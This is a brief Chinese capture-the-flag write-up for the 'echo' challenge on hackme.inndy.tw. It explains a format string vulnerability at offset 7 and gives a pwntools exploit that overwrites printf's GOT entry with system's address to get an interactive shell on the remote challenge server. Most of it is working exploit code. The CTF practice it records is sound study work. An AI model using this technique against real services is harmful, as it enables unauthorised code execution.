echo
2018-08-17 本文已影响0人
2mpossible
教科书般的格式化字符串漏洞,先找到偏移为7
然后将prinf_got地址改成system地址即可
exp:
from pwn import *
#p = process('./echo')
p = remote('hackme.inndy.tw',7711)
elf = ELF('./echo')
offset = 7
printf_got = elf.got['printf']
system_addr = elf.plt['system']
payload = fmtstr_payload(offset,{printf_got:system_addr})
p.sendline(payload)
p.interactive()
